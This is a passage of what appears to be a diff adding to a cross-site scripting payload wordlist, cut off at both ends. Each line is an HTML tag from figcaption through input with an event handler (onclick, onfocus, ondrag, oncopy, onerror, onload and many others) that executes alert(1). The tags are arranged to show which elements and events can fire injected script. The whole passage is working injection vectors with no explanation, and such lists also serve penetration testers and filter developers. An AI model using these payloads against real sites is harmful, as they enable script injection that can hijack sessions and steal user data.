onmouseenter="alert(1)">test</figcaption> +<figcaption onmouseleave="alert(1)">test</figcaption> +<figcaption onmousemove="alert(1)">test</figcaption> +<figcaption onmouseout="alert(1)">test</figcaption> +<figcaption onmouseover="alert(1)">test</figcaption> +<figcaption onmouseup="alert(1)">test</figcaption> +<figcaption onpaste="alert(1)" contenteditable>test</figcaption> +<figure draggable="true" ondrag="alert(1)">test</figure> +<figure draggable="true" ondragend="alert(1)">test</figure> +<figure draggable="true" ondragenter="alert(1)">test</figure> +<figure draggable="true" ondragleave="alert(1)">test</figure> +<figure draggable="true" ondragstart="alert(1)">test</figure> +<figure id=x tabindex=1 onactivate=alert(1)></figure> +<figure id=x tabindex=1 onbeforeactivate=alert(1)></figure> +<figure id=x tabindex=1 onbeforedeactivate=alert(1)></figure><input autofocus> +<figure id=x tabindex=1 ondeactivate=alert(1)></figure><input id=y autofocus> +<figure id=x tabindex=1 onfocus=alert(1)></figure> +<figure id=x tabindex=1 onfocusin=alert(1)></figure> +<figure onbeforecopy="alert(1)" contenteditable>test</figure> +<figure onbeforecut="alert(1)" contenteditable>test</figure> +<figure onbeforepaste="alert(1)" contenteditable>test</figure> +<figure onblur=alert(1) tabindex=1 id=x></figure><input autofocus> +<figure onclick="alert(1)">test</figure> +<figure oncontextmenu="alert(1)">test</figure> +<figure oncopy="alert(1)" contenteditable>test</figure> +<figure oncut="alert(1)" contenteditable>test</figure> +<figure ondblclick="alert(1)">test</figure> +<figure onfocusout=alert(1) tabindex=1 id=x></figure><input autofocus> +<figure onkeydown="alert(1)" contenteditable>test</figure> +<figure onkeypress="alert(1)" contenteditable>test</figure> +<figure onkeyup="alert(1)" contenteditable>test</figure> +<figure onmousedown="alert(1)">test</figure> +<figure onmouseenter="alert(1)">test</figure> +<figure onmouseleave="alert(1)">test</figure> +<figure onmousemove="alert(1)">test</figure> +<figure onmouseout="alert(1)">test</figure> +<figure onmouseover="alert(1)">test</figure> +<figure onmouseup="alert(1)">test</figure> +<figure onpaste="alert(1)" contenteditable>test</figure> +<font draggable="true" ondrag="alert(1)">test</font> +<font draggable="true" ondragend="alert(1)">test</font> +<font draggable="true" ondragenter="alert(1)">test</font> +<font draggable="true" ondragleave="alert(1)">test</font> +<font draggable="true" ondragstart="alert(1)">test</font> +<font id=x tabindex=1 onactivate=alert(1)></font> +<font id=x tabindex=1 onbeforeactivate=alert(1)></font> +<font id=x tabindex=1 onbeforedeactivate=alert(1)></font><input autofocus> +<font id=x tabindex=1 ondeactivate=alert(1)></font><input id=y autofocus> +<font id=x tabindex=1 onfocus=alert(1)></font> +<font id=x tabindex=1 onfocusin=alert(1)></font> +<font onbeforecopy="alert(1)" contenteditable>test</font> +<font onbeforecut="alert(1)" contenteditable>test</font> +<font onbeforepaste="alert(1)" contenteditable>test</font> +<font onblur=alert(1) tabindex=1 id=x></font><input autofocus> +<font onclick="alert(1)">test</font> +<font oncontextmenu="alert(1)">test</font> +<font oncopy="alert(1)" contenteditable>test</font> +<font oncut="alert(1)" contenteditable>test</font> +<font ondblclick="alert(1)">test</font> +<font onfocusout=alert(1) tabindex=1 id=x></font><input autofocus> +<font onkeydown="alert(1)" contenteditable>test</font> +<font onkeypress="alert(1)" contenteditable>test</font> +<font onkeyup="alert(1)" contenteditable>test</font> +<font onmousedown="alert(1)">test</font> +<font onmouseenter="alert(1)">test</font> +<font onmouseleave="alert(1)">test</font> +<font onmousemove="alert(1)">test</font> +<font onmouseout="alert(1)">test</font> +<font onmouseover="alert(1)">test</font> +<font onmouseup="alert(1)">test</font> +<font onpaste="alert(1)" contenteditable>test</font> +<footer draggable="true" ondrag="alert(1)">test</footer> +<footer draggable="true" ondragend="alert(1)">test</footer> +<footer draggable="true" ondragenter="alert(1)">test</footer> +<footer draggable="true" ondragleave="alert(1)">test</footer> +<footer draggable="true" ondragstart="alert(1)">test</footer> +<footer id=x tabindex=1 onactivate=alert(1)></footer> +<footer id=x tabindex=1 onbeforeactivate=alert(1)></footer> +<footer id=x tabindex=1 onbeforedeactivate=alert(1)></footer><input autofocus> +<footer id=x tabindex=1 ondeactivate=alert(1)></footer><input id=y autofocus> +<footer id=x tabindex=1 onfocus=alert(1)></footer> +<footer id=x tabindex=1 onfocusin=alert(1)></footer> +<footer onbeforecopy="alert(1)" contenteditable>test</footer> +<footer onbeforecut="alert(1)" contenteditable>test</footer> +<footer onbeforepaste="alert(1)" contenteditable>test</footer> +<footer onblur=alert(1) tabindex=1 id=x></footer><input autofocus> +<footer onclick="alert(1)">test</footer> +<footer oncontextmenu="alert(1)">test</footer> +<footer oncopy="alert(1)" contenteditable>test</footer> +<footer oncut="alert(1)" contenteditable>test</footer> +<footer ondblclick="alert(1)">test</footer> +<footer onfocusout=alert(1) tabindex=1 id=x></footer><input autofocus> +<footer onkeydown="alert(1)" contenteditable>test</footer> +<footer onkeypress="alert(1)" contenteditable>test</footer> +<footer onkeyup="alert(1)" contenteditable>test</footer> +<footer onmousedown="alert(1)">test</footer> +<footer onmouseenter="alert(1)">test</footer> +<footer onmouseleave="alert(1)">test</footer> +<footer onmousemove="alert(1)">test</footer> +<footer onmouseout="alert(1)">test</footer> +<footer onmouseover="alert(1)">test</footer> +<footer onmouseup="alert(1)">test</footer> +<footer onpaste="alert(1)" contenteditable>test</footer> +<form draggable="true" ondrag="alert(1)">test</form> +<form draggable="true" ondragend="alert(1)">test</form> +<form draggable="true" ondragenter="alert(1)">test</form> +<form draggable="true" ondragleave="alert(1)">test</form> +<form draggable="true" ondragstart="alert(1)">test</form> +<form id=x tabindex=1 onactivate=alert(1)></form> +<form id=x tabindex=1 onbeforeactivate=alert(1)></form> +<form id=x tabindex=1 onbeforedeactivate=alert(1)></form><input autofocus> +<form id=x tabindex=1 ondeactivate=alert(1)></form><input id=y autofocus> +<form id=x tabindex=1 onfocus=alert(1)></form> +<form id=x tabindex=1 onfocusin=alert(1)></form> +<form onbeforecopy="alert(1)" contenteditable>test</form> +<form onbeforecut="alert(1)" contenteditable>test</form> +<form onbeforepaste="alert(1)" contenteditable>test</form> +<form onblur=alert(1) tabindex=1 id=x></form><input autofocus> +<form onclick="alert(1)">test</form> +<form oncontextmenu="alert(1)">test</form> +<form oncopy="alert(1)" contenteditable>test</form> +<form oncut="alert(1)" contenteditable>test</form> +<form ondblclick="alert(1)">test</form> +<form onfocusout=alert(1) tabindex=1 id=x></form><input autofocus> +<form onkeydown="alert(1)" contenteditable>test</form> +<form onkeypress="alert(1)" contenteditable>test</form> +<form onkeyup="alert(1)" contenteditable>test</form> +<form onmousedown="alert(1)">test</form> +<form onmouseenter="alert(1)">test</form> +<form onmouseleave="alert(1)">test</form> +<form onmousemove="alert(1)">test</form> +<form onmouseout="alert(1)">test</form> +<form onmouseover="alert(1)">test</form> +<form onmouseup="alert(1)">test</form> +<form onpaste="alert(1)" contenteditable>test</form> +<form onreset=alert(1)><input type=reset> +<form onsubmit=alert(1)><input type=submit> +<form><input oninvalid=alert(1) required><input type=submit> +<form><input type=search onsearch=alert(1) value="Hit return" autofocus> +<form><textarea oninvalid=alert(1) required><input type=submit> +<frame draggable="true" ondrag="alert(1)">test</frame> +<frame draggable="true" ondragend="alert(1)">test</frame> +<frame draggable="true" ondragenter="alert(1)">test</frame> +<frame draggable="true" ondragleave="alert(1)">test</frame> +<frame draggable="true" ondragstart="alert(1)">test</frame> +<frame id=x tabindex=1 onactivate=alert(1)></frame> +<frame id=x tabindex=1 onbeforeactivate=alert(1)></frame> +<frame id=x tabindex=1 onbeforedeactivate=alert(1)></frame><input autofocus> +<frame id=x tabindex=1 ondeactivate=alert(1)></frame><input id=y autofocus> +<frame onbeforecopy="alert(1)" contenteditable>test</frame> +<frame onbeforecut="alert(1)" contenteditable>test</frame> +<frame onbeforepaste="alert(1)" contenteditable>test</frame> +<frame onblur=alert(1) tabindex=1 id=x></frame><input autofocus> +<frame onclick="alert(1)">test</frame> +<frame oncontextmenu="alert(1)">test</frame> +<frame oncopy="alert(1)" contenteditable>test</frame> +<frame oncut="alert(1)" contenteditable>test</frame> +<frame ondblclick="alert(1)">test</frame> +<frame onfocusout=alert(1) tabindex=1 id=x></frame><input autofocus> +<frame onkeydown="alert(1)" contenteditable>test</frame> +<frame onkeypress="alert(1)" contenteditable>test</frame> +<frame onkeyup="alert(1)" contenteditable>test</frame> +<frame onmousedown="alert(1)">test</frame> +<frame onmouseenter="alert(1)">test</frame> +<frame onmouseleave="alert(1)">test</frame> +<frame onmousemove="alert(1)">test</frame> +<frame onmouseout="alert(1)">test</frame> +<frame onmouseover="alert(1)">test</frame> +<frame onmouseup="alert(1)">test</frame> +<frame onpaste="alert(1)" contenteditable>test</frame> +<frameset draggable="true" ondrag="alert(1)">test</frameset> +<frameset draggable="true" ondragend="alert(1)">test</frameset> +<frameset draggable="true" ondragenter="alert(1)">test</frameset> +<frameset draggable="true" ondragleave="alert(1)">test</frameset> +<frameset draggable="true" ondragstart="alert(1)">test</frameset> +<frameset id=x tabindex=1 onactivate=alert(1)></frameset> +<frameset id=x tabindex=1 onbeforeactivate=alert(1)></frameset> +<frameset id=x tabindex=1 onbeforedeactivate=alert(1)></frameset><input autofocus> +<frameset id=x tabindex=1 ondeactivate=alert(1)></frameset><input id=y autofocus> +<frameset id=x tabindex=1 onfocus=alert(1)></frameset> +<frameset id=x tabindex=1 onfocusin=alert(1)></frameset> +<frameset onbeforecopy="alert(1)" contenteditable>test</frameset> +<frameset onbeforecut="alert(1)" contenteditable>test</frameset> +<frameset onbeforepaste="alert(1)" contenteditable>test</frameset> +<frameset onblur=alert(1) tabindex=1 id=x></frameset><input autofocus> +<frameset onclick="alert(1)">test</frameset> +<frameset oncontextmenu="alert(1)">test</frameset> +<frameset oncopy="alert(1)" contenteditable>test</frameset> +<frameset oncut="alert(1)" contenteditable>test</frameset> +<frameset ondblclick="alert(1)">test</frameset> +<frameset onfocusout=alert(1) tabindex=1 id=x></frameset><input autofocus> +<frameset onkeydown="alert(1)" contenteditable>test</frameset> +<frameset onkeypress="alert(1)" contenteditable>test</frameset> +<frameset onkeyup="alert(1)" contenteditable>test</frameset> +<frameset onmousedown="alert(1)">test</frameset> +<frameset onmouseenter="alert(1)">test</frameset> +<frameset onmouseleave="alert(1)">test</frameset> +<frameset onmousemove="alert(1)">test</frameset> +<frameset onmouseout="alert(1)">test</frameset> +<frameset onmouseover="alert(1)">test</frameset> +<frameset onmouseup="alert(1)">test</frameset> +<frameset onpageshow=alert(1)> +<frameset onpaste="alert(1)" contenteditable>test</frameset> +<frameset><frame id=x onfocus=alert(1)> +<frameset><frame id=x onfocusin=alert(1)> +<frameset><frame onload=alert(1)> +<h1 draggable="true" ondrag="alert(1)">test</h1> +<h1 draggable="true" ondragend="alert(1)">test</h1> +<h1 draggable="true" ondragenter="alert(1)">test</h1> +<h1 draggable="true" ondragleave="alert(1)">test</h1> +<h1 draggable="true" ondragstart="alert(1)">test</h1> +<h1 id=x tabindex=1 onactivate=alert(1)></h1> +<h1 id=x tabindex=1 onbeforeactivate=alert(1)></h1> +<h1 id=x tabindex=1 onbeforedeactivate=alert(1)></h1><input autofocus> +<h1 id=x tabindex=1 ondeactivate=alert(1)></h1><input id=y autofocus> +<h1 id=x tabindex=1 onfocus=alert(1)></h1> +<h1 id=x tabindex=1 onfocusin=alert(1)></h1> +<h1 onbeforecopy="alert(1)" contenteditable>test</h1> +<h1 onbeforecut="alert(1)" contenteditable>test</h1> +<h1 onbeforepaste="alert(1)" contenteditable>test</h1> +<h1 onblur=alert(1) tabindex=1 id=x></h1><input autofocus> +<h1 onclick="alert(1)">test</h1> +<h1 oncontextmenu="alert(1)">test</h1> +<h1 oncopy="alert(1)" contenteditable>test</h1> +<h1 oncut="alert(1)" contenteditable>test</h1> +<h1 ondblclick="alert(1)">test</h1> +<h1 onfocusout=alert(1) tabindex=1 id=x></h1><input autofocus> +<h1 onkeydown="alert(1)" contenteditable>test</h1> +<h1 onkeypress="alert(1)" contenteditable>test</h1> +<h1 onkeyup="alert(1)" contenteditable>test</h1> +<h1 onmousedown="alert(1)">test</h1> +<h1 onmouseenter="alert(1)">test</h1> +<h1 onmouseleave="alert(1)">test</h1> +<h1 onmousemove="alert(1)">test</h1> +<h1 onmouseout="alert(1)">test</h1> +<h1 onmouseover="alert(1)">test</h1> +<h1 onmouseup="alert(1)">test</h1> +<h1 onpaste="alert(1)" contenteditable>test</h1> +<head draggable="true" ondrag="alert(1)">test</head> +<head draggable="true" ondragend="alert(1)">test</head> +<head draggable="true" ondragenter="alert(1)">test</head> +<head draggable="true" ondragleave="alert(1)">test</head> +<head draggable="true" ondragstart="alert(1)">test</head> +<head id=x tabindex=1 onactivate=alert(1)></head> +<head id=x tabindex=1 onbeforeactivate=alert(1)></head> +<head id=x tabindex=1 onbeforedeactivate=alert(1)></head><input autofocus> +<head id=x tabindex=1 ondeactivate=alert(1)></head><input id=y autofocus> +<head id=x tabindex=1 onfocus=alert(1)></head> +<head id=x tabindex=1 onfocusin=alert(1)></head> +<head onbeforecopy="alert(1)" contenteditable>test</head> +<head onbeforecut="alert(1)" contenteditable>test</head> +<head onbeforepaste="alert(1)" contenteditable>test</head> +<head onblur=alert(1) tabindex=1 id=x></head><input autofocus> +<head onclick="alert(1)">test</head> +<head oncontextmenu="alert(1)">test</head> +<head oncopy="alert(1)" contenteditable>test</head> +<head oncut="alert(1)" contenteditable>test</head> +<head ondblclick="alert(1)">test</head> +<head onfocusout=alert(1) tabindex=1 id=x></head><input autofocus> +<head onkeydown="alert(1)" contenteditable>test</head> +<head onkeypress="alert(1)" contenteditable>test</head> +<head onkeyup="alert(1)" contenteditable>test</head> +<head onmousedown="alert(1)">test</head> +<head onmouseenter="alert(1)">test</head> +<head onmouseleave="alert(1)">test</head> +<head onmousemove="alert(1)">test</head> +<head onmouseout="alert(1)">test</head> +<head onmouseover="alert(1)">test</head> +<head onmouseup="alert(1)">test</head> +<head onpaste="alert(1)" contenteditable>test</head> +<header draggable="true" ondrag="alert(1)">test</header> +<header draggable="true" ondragend="alert(1)">test</header> +<header draggable="true" ondragenter="alert(1)">test</header> +<header draggable="true" ondragleave="alert(1)">test</header> +<header draggable="true" ondragstart="alert(1)">test</header> +<header id=x tabindex=1 onactivate=alert(1)></header> +<header id=x tabindex=1 onbeforeactivate=alert(1)></header> +<header id=x tabindex=1 onbeforedeactivate=alert(1)></header><input autofocus> +<header id=x tabindex=1 ondeactivate=alert(1)></header><input id=y autofocus> +<header id=x tabindex=1 onfocus=alert(1)></header> +<header id=x tabindex=1 onfocusin=alert(1)></header> +<header onbeforecopy="alert(1)" contenteditable>test</header> +<header onbeforecut="alert(1)" contenteditable>test</header> +<header onbeforepaste="alert(1)" contenteditable>test</header> +<header onblur=alert(1) tabindex=1 id=x></header><input autofocus> +<header onclick="alert(1)">test</header> +<header oncontextmenu="alert(1)">test</header> +<header oncopy="alert(1)" contenteditable>test</header> +<header oncut="alert(1)" contenteditable>test</header> +<header ondblclick="alert(1)">test</header> +<header onfocusout=alert(1) tabindex=1 id=x></header><input autofocus> +<header onkeydown="alert(1)" contenteditable>test</header> +<header onkeypress="alert(1)" contenteditable>test</header> +<header onkeyup="alert(1)" contenteditable>test</header> +<header onmousedown="alert(1)">test</header> +<header onmouseenter="alert(1)">test</header> +<header onmouseleave="alert(1)">test</header> +<header onmousemove="alert(1)">test</header> +<header onmouseout="alert(1)">test</header> +<header onmouseover="alert(1)">test</header> +<header onmouseup="alert(1)">test</header> +<header onpaste="alert(1)" contenteditable>test</header> +<hgroup draggable="true" ondrag="alert(1)">test</hgroup> +<hgroup draggable="true" ondragend="alert(1)">test</hgroup> +<hgroup draggable="true" ondragenter="alert(1)">test</hgroup> +<hgroup draggable="true" ondragleave="alert(1)">test</hgroup> +<hgroup draggable="true" ondragstart="alert(1)">test</hgroup> +<hgroup id=x tabindex=1 onactivate=alert(1)></hgroup> +<hgroup id=x tabindex=1 onbeforeactivate=alert(1)></hgroup> +<hgroup id=x tabindex=1 onbeforedeactivate=alert(1)></hgroup><input autofocus> +<hgroup id=x tabindex=1 ondeactivate=alert(1)></hgroup><input id=y autofocus> +<hgroup id=x tabindex=1 onfocus=alert(1)></hgroup> +<hgroup id=x tabindex=1 onfocusin=alert(1)></hgroup> +<hgroup onbeforecopy="alert(1)" contenteditable>test</hgroup> +<hgroup onbeforecut="alert(1)" contenteditable>test</hgroup> +<hgroup onbeforepaste="alert(1)" contenteditable>test</hgroup> +<hgroup onblur=alert(1) tabindex=1 id=x></hgroup><input autofocus> +<hgroup onclick="alert(1)">test</hgroup> +<hgroup oncontextmenu="alert(1)">test</hgroup> +<hgroup oncopy="alert(1)" contenteditable>test</hgroup> +<hgroup oncut="alert(1)" contenteditable>test</hgroup> +<hgroup ondblclick="alert(1)">test</hgroup> +<hgroup onfocusout=alert(1) tabindex=1 id=x></hgroup><input autofocus> +<hgroup onkeydown="alert(1)" contenteditable>test</hgroup> +<hgroup onkeypress="alert(1)" contenteditable>test</hgroup> +<hgroup onkeyup="alert(1)" contenteditable>test</hgroup> +<hgroup onmousedown="alert(1)">test</hgroup> +<hgroup onmouseenter="alert(1)">test</hgroup> +<hgroup onmouseleave="alert(1)">test</hgroup> +<hgroup onmousemove="alert(1)">test</hgroup> +<hgroup onmouseout="alert(1)">test</hgroup> +<hgroup onmouseover="alert(1)">test</hgroup> +<hgroup onmouseup="alert(1)">test</hgroup> +<hgroup onpaste="alert(1)" contenteditable>test</hgroup> +<hr draggable="true" ondrag="alert(1)">test</hr> +<hr draggable="true" ondragend="alert(1)">test</hr> +<hr draggable="true" ondragenter="alert(1)">test</hr> +<hr draggable="true" ondragleave="alert(1)">test</hr> +<hr draggable="true" ondragstart="alert(1)">test</hr> +<hr id=x tabindex=1 onactivate=alert(1)></hr> +<hr id=x tabindex=1 onbeforeactivate=alert(1)></hr> +<hr id=x tabindex=1 onbeforedeactivate=alert(1)></hr><input autofocus> +<hr id=x tabindex=1 ondeactivate=alert(1)></hr><input id=y autofocus> +<hr id=x tabindex=1 onfocus=alert(1)></hr> +<hr id=x tabindex=1 onfocusin=alert(1)></hr> +<hr onbeforecopy="alert(1)" contenteditable>test</hr> +<hr onbeforecut="alert(1)" contenteditable>test</hr> +<hr onbeforepaste="alert(1)" contenteditable>test</hr> +<hr onblur=alert(1) tabindex=1 id=x></hr><input autofocus> +<hr onclick="alert(1)">test</hr> +<hr oncontextmenu="alert(1)">test</hr> +<hr oncopy="alert(1)" contenteditable>test</hr> +<hr oncut="alert(1)" contenteditable>test</hr> +<hr ondblclick="alert(1)">test</hr> +<hr onfocusout=alert(1) tabindex=1 id=x></hr><input autofocus> +<hr onkeydown="alert(1)" contenteditable>test</hr> +<hr onkeypress="alert(1)" contenteditable>test</hr> +<hr onkeyup="alert(1)" contenteditable>test</hr> +<hr onmousedown="alert(1)">test</hr> +<hr onmouseenter="alert(1)">test</hr> +<hr onmouseleave="alert(1)">test</hr> +<hr onmousemove="alert(1)">test</hr> +<hr onmouseout="alert(1)">test</hr> +<hr onmouseover="alert(1)">test</hr> +<hr onmouseup="alert(1)">test</hr> +<hr onpaste="alert(1)" contenteditable>test</hr> +<html draggable="true" ondrag="alert(1)">test</html> +<html draggable="true" ondragend="alert(1)">test</html> +<html draggable="true" ondragenter="alert(1)">test</html> +<html draggable="true" ondragleave="alert(1)">test</html> +<html draggable="true" ondragstart="alert(1)">test</html> +<html id=x tabindex=1 onactivate=alert(1)></html> +<html id=x tabindex=1 onbeforeactivate=alert(1)></html> +<html id=x tabindex=1 onbeforedeactivate=alert(1)></html><input autofocus> +<html id=x tabindex=1 ondeactivate=alert(1)></html><input id=y autofocus> +<html id=x tabindex=1 onfocus=alert(1)></html> +<html id=x tabindex=1 onfocusin=alert(1)></html> +<html onbeforecopy="alert(1)" contenteditable>test</html> +<html onbeforecut="alert(1)" contenteditable>test</html> +<html onbeforepaste="alert(1)" contenteditable>test</html> +<html onblur=alert(1) tabindex=1 id=x></html><input autofocus> +<html onclick="alert(1)">test</html> +<html oncontextmenu="alert(1)">test</html> +<html oncopy="alert(1)" contenteditable>test</html> +<html oncut="alert(1)" contenteditable>test</html> +<html ondblclick="alert(1)">test</html> +<html onfocusout=alert(1) tabindex=1 id=x></html><input autofocus> +<html onkeydown="alert(1)" contenteditable>test</html> +<html onkeypress="alert(1)" contenteditable>test</html> +<html onkeyup="alert(1)" contenteditable>test</html> +<html onmousedown="alert(1)">test</html> +<html onmouseenter="alert(1)">test</html> +<html onmouseleave="alert(1)">test</html> +<html onmousemove="alert(1)">test</html> +<html onmouseout="alert(1)">test</html> +<html onmouseover="alert(1)">test</html> +<html onmouseup="alert(1)">test</html> +<html onpaste="alert(1)" contenteditable>test</html> +<i draggable="true" ondrag="alert(1)">test</i> +<i draggable="true" ondragend="alert(1)">test</i> +<i draggable="true" ondragenter="alert(1)">test</i> +<i draggable="true" ondragleave="alert(1)">test</i> +<i draggable="true" ondragstart="alert(1)">test</i> +<i id=x tabindex=1 onactivate=alert(1)></i> +<i id=x tabindex=1 onbeforeactivate=alert(1)></i> +<i id=x tabindex=1 onbeforedeactivate=alert(1)></i><input autofocus> +<i id=x tabindex=1 ondeactivate=alert(1)></i><input id=y autofocus> +<i id=x tabindex=1 onfocus=alert(1)></i> +<i id=x tabindex=1 onfocusin=alert(1)></i> +<i onbeforecopy="alert(1)" contenteditable>test</i> +<i onbeforecut="alert(1)" contenteditable>test</i> +<i onbeforepaste="alert(1)" contenteditable>test</i> +<i onblur=alert(1) tabindex=1 id=x></i><input autofocus> +<i onclick="alert(1)">test</i> +<i oncontextmenu="alert(1)">test</i> +<i oncopy="alert(1)" contenteditable>test</i> +<i oncut="alert(1)" contenteditable>test</i> +<i ondblclick="alert(1)">test</i> +<i onfocusout=alert(1) tabindex=1 id=x></i><input autofocus> +<i onkeydown="alert(1)" contenteditable>test</i> +<i onkeypress="alert(1)" contenteditable>test</i> +<i onkeyup="alert(1)" contenteditable>test</i> +<i onmousedown="alert(1)">test</i> +<i onmouseenter="alert(1)">test</i> +<i onmouseleave="alert(1)">test</i> +<i onmousemove="alert(1)">test</i> +<i onmouseout="alert(1)">test</i> +<i onmouseover="alert(1)">test</i> +<i onmouseup="alert(1)">test</i> +<i onpaste="alert(1)" contenteditable>test</i> +<iframe draggable="true" ondrag="alert(1)">test</iframe> +<iframe draggable="true" ondragend="alert(1)">test</iframe> +<iframe draggable="true" ondragenter="alert(1)">test</iframe> +<iframe draggable="true" ondragleave="alert(1)">test</iframe> +<iframe draggable="true" ondragstart="alert(1)">test</iframe> +<iframe id=x onfocus=alert(1)> +<iframe id=x onfocusin=alert(1)> +<iframe id=x tabindex=1 onactivate=alert(1)></iframe> +<iframe id=x tabindex=1 onbeforeactivate=alert(1)></iframe> +<iframe id=x tabindex=1 onbeforedeactivate=alert(1)></iframe><input autofocus> +<iframe id=x tabindex=1 ondeactivate=alert(1)></iframe><input id=y autofocus> +<iframe onbeforecopy="alert(1)" contenteditable>test</iframe> +<iframe onbeforecut="alert(1)" contenteditable>test</iframe> +<iframe onbeforepaste="alert(1)" contenteditable>test</iframe> +<iframe onblur=alert(1) id=x><input autofocus> +<iframe onclick="alert(1)">test</iframe> +<iframe oncontextmenu="alert(1)">test</iframe> +<iframe oncopy="alert(1)" contenteditable>test</iframe> +<iframe oncut="alert(1)" contenteditable>test</iframe> +<iframe ondblclick="alert(1)">test</iframe> +<iframe onfocusout=alert(1) id=x><input autofocus> +<iframe onkeydown="alert(1)" contenteditable>test</iframe> +<iframe onkeypress="alert(1)" contenteditable>test</iframe> +<iframe onkeyup="alert(1)" contenteditable>test</iframe> +<iframe onload=alert(1)></iframe> +<iframe onmousedown="alert(1)">test</iframe> +<iframe onmouseenter="alert(1)">test</iframe> +<iframe onmouseleave="alert(1)">test</iframe> +<iframe onmousemove="alert(1)">test</iframe> +<iframe onmouseout="alert(1)">test</iframe> +<iframe onmouseover="alert(1)">test</iframe> +<iframe onmouseup="alert(1)">test</iframe> +<iframe onpaste="alert(1)" contenteditable>test</iframe> +<iframe onreadystatechange=alert(1)></iframe> +<image draggable="true" ondrag="alert(1)">test</image> +<image draggable="true" ondragend="alert(1)">test</image> +<image draggable="true" ondragenter="alert(1)">test</image> +<image draggable="true" ondragleave="alert(1)">test</image> +<image draggable="true" ondragstart="alert(1)">test</image> +<image id=x tabindex=1 onactivate=alert(1)></image> +<image id=x tabindex=1 onbeforeactivate=alert(1)></image> +<image id=x tabindex=1 onbeforedeactivate=alert(1)></image><input autofocus> +<image id=x tabindex=1 ondeactivate=alert(1)></image><input id=y autofocus> +<image id=x tabindex=1 onfocus=alert(1)></image> +<image id=x tabindex=1 onfocusin=alert(1)></image> +<image onbeforecopy="alert(1)" contenteditable>test</image> +<image onbeforecut="alert(1)" contenteditable>test</image> +<image onbeforepaste="alert(1)" contenteditable>test</image> +<image onblur=alert(1) tabindex=1 id=x></image><input autofocus> +<image onclick="alert(1)">test</image> +<image oncontextmenu="alert(1)">test</image> +<image oncopy="alert(1)" contenteditable>test</image> +<image oncut="alert(1)" contenteditable>test</image> +<image ondblclick="alert(1)">test</image> +<image onfocusout=alert(1) tabindex=1 id=x></image><input autofocus> +<image onkeydown="alert(1)" contenteditable>test</image> +<image onkeypress="alert(1)" contenteditable>test</image> +<image onkeyup="alert(1)" contenteditable>test</image> +<image onmousedown="alert(1)">test</image> +<image onmouseenter="alert(1)">test</image> +<image onmouseleave="alert(1)">test</image> +<image onmousemove="alert(1)">test</image> +<image onmouseout="alert(1)">test</image> +<image onmouseover="alert(1)">test</image> +<image onmouseup="alert(1)">test</image> +<image onpaste="alert(1)" contenteditable>test</image> +<image src/onerror=alert(1)> +<image src=validimage.png onload=alert(1)> +<image src=validimage.png onloadend=alert(1)> +<image src=validimage.png onloadstart=alert(1)> +<image srcset=1 onerror=alert(1)> +<img draggable="true" ondrag="alert(1)">test</img> +<img draggable="true" ondragend="alert(1)">test</img> +<img draggable="true" ondragenter="alert(1)">test</img> +<img draggable="true" ondragleave="alert(1)">test</img> +<img draggable="true" ondragstart="alert(1)">test</img> +<img id=x tabindex=1 onactivate=alert(1)></img> +<img id=x tabindex=1 onbeforeactivate=alert(1)></img> +<img id=x tabindex=1 onbeforedeactivate=alert(1)></img><input autofocus> +<img id=x tabindex=1 ondeactivate=alert(1)></img><input id=y autofocus> +<img id=x tabindex=1 onfocus=alert(1)></img> +<img id=x tabindex=1 onfocusin=alert(1)></img> +<img onbeforecopy="alert(1)" contenteditable>test</img> +<img onbeforecut="alert(1)" contenteditable>test</img> +<img onbeforepaste="alert(1)" contenteditable>test</img> +<img onblur=alert(1) tabindex=1 id=x></img><input autofocus> +<img onclick="alert(1)">test</img> +<img oncontextmenu="alert(1)">test</img> +<img oncopy="alert(1)" contenteditable>test</img> +<img oncut="alert(1)" contenteditable>test</img> +<img ondblclick="alert(1)">test</img> +<img onfocusout=alert(1) tabindex=1 id=x></img><input autofocus> +<img onkeydown="alert(1)" contenteditable>test</img> +<img onkeypress="alert(1)" contenteditable>test</img> +<img onkeyup="alert(1)" contenteditable>test</img> +<img onmousedown="alert(1)">test</img> +<img onmouseenter="alert(1)">test</img> +<img onmouseleave="alert(1)">test</img> +<img onmousemove="alert(1)">test</img> +<img onmouseout="alert(1)">test</img> +<img onmouseover="alert(1)">test</img> +<img onmouseup="alert(1)">test</img> +<img onpaste="alert(1)" contenteditable>test</img> +<img src/onerror=alert(1)> +<img src=validimage.png onload=alert(1)> +<img src=validimage.png onloadend=alert(1)> +<img src=validimage.png onloadstart=alert(1)> +<img srcset=1 onerror=alert(1)> +<img srcset=validimage.png onload=alert(1)> +<img usemap=#x><map name="x"><area href onfocus=alert(1) id=x> +<img usemap=#x><map name="x"><area href onfocusin=alert(1) id=x> +<input autofocus onfocus=alert(1)> +<input autofocus onfocusin=alert(1)> +<input draggable="true" ondrag="alert(1)">test</input> +<input draggable="true" ondragend="alert(1)">test</input> +<input draggable="true" ondragenter="alert(1)">test</input> +<input draggable="true" ondragleave="alert(1)">test</input> +<input draggable="true" ondragstart="alert(1)">test</input> +<input id=x onfocus=alert(1)> +<input id=x onfocusin=alert(1)> +<input id=x tabindex=1 onactivate=alert(1)></input> +<input id=x tabindex=1 onbeforeactivate=alert(1)></input> +<input id=x tabindex=1 onbeforedeactivate=alert(1)></input><input autofocus> +<input id=x tabindex=1 ondeactivate=alert(1)></input><input id=y autofocus> +<input onauxclick=alert(1)> +<input onbeforecopy=alert(1) value="XSS" autofocus> +<input onbeforecut=alert(1) value="XSS" autofocus> +<input onbeforepaste=alert(1) value="" autofocus> +<input onblur=alert(1) id=x><input autofocus> +<input onchange=alert(1) value=xss> +<input onclick="alert(1)">test</input> +<input oncontextmenu="alert(1)">test</input> +<input oncopy=alert(1) value="XSS" autofocus> +<input oncut=alert(1) value="XSS" autofocus> +<input ondblclick="alert(1)">test</input> +<input onfocusout=alert(1) id=x><input autofocus> +<input oninput=alert(1) value=xss> +<input onkeydown="alert(1)" contenteditable>test</input> +<input onkeypress="alert(1)" contenteditable>test</input> +<input onkeyup="alert(1)" contenteditable>test</input> +<input onmousedown="alert(1)">test</input> +<input onmouseenter="alert(1)">test</input> +<input onmouseleave="alert(1)">test</input> +<input onmousemove="alert(1)">test</input> +<input onmouseout="alert(1)">test</input> +<input onmouseover="alert(1)">test</input> +<input onmouseup="alert(1)">test</input> +<input onpaste=alert(1) value="" autofocus> +<input onselect=alert(1) value="XSS" autofocus> +<input type=checkbox id=x onfocus=alert(1)> +<input type=checkbox id=x onfocusin=alert(1)> +<input type=image onloadend=alert(1) src=validimage.png> +<input type=image onloadstart=alert(1) src=validimage.png> +<input type=image src=1 onerror=alert(1)> +<input type=image src=validimage.png onload=alert(1)> +<input 